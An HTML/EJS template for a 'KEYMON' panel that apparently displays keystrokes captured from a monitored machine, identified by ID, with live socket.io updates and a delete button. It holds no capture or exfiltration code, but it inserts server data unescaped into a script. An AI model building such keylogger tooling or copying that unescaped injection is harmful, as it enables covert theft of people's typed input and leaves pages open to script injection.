<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>KEYMON PANEL</title>
    <link rel="stylesheet" href="./assets/css/main.css">
    <style>
        .container {
            background: #000000;
        }

        .content {
            display: flex;
            flex-wrap: wrap;
            gap: .2rem;
        }

        .key {
            padding: .2rem .5rem;
            background: rgba(255, 255, 255, 0.2);
            color: #e5e5e5;
            font-size: 1.3rem;
        }

        .vk-key {
            background: #00ffddda;
            color: black;
        }
    </style>
    <script>
        const ID = `<%- id %>`
        const keyData = JSON.parse(`<%- data %>`)
    </script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.7.5/socket.io.js"
        integrity="sha512-luMnTJZ7oEchNDZAtQhgjomP1eZefnl82ruTH/3Oj/Yu5qYtwL7+dVRccACS/Snp1lFXq188XFipHKYE75IaQQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="/assets/js/panel.js" defer></script>
</head>

<body>
    <div class="container">
        <div class="header">
            <h2>keymon</h2>
            <div class="center">
                <h3><%- id %></h3>
            </div>
            <div class="right">
                <button class="b-btn delete-btn"><i class="fa-solid fa-trash"></i></button>
                <a href="/"> <button class="b-btn"><i class="fa-solid fa-house"></i></button></a>
            </div>
        </div>

        <div class="content" id="key-content"></div>
    </div>
</body>

</html>